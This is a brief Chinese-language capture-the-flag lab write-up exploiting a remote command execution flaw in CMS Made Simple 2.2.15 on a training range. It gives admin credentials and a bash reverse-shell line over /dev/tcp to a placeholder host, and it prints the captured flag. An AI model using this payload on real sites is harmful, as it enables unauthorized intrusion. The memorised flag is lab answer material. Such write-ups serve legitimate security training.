声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
春秋云镜开启靶场:
http://eci-2zecxdpsvmx9raxra00e.cloudeci1.ichunqiu.com/
登录后台
http://eci-2zecxdpsvmx9raxra00e.cloudeci1.ichunqiu.com/admin/login.php
账号admin 密码123456
后台命令执行漏洞
扩展---用户定义标签---新增自定义标签
添加代码
exec("/bin/bash -c 'bash -i > /dev/tcp/ip/port 0>&1'");
单击新创建的用户定义标记并使用Run
成功反弹shell
cat ../../../../../flag
flag{9de7dbe4-7fa4-4398-bf3b-562e0e0a0dfb}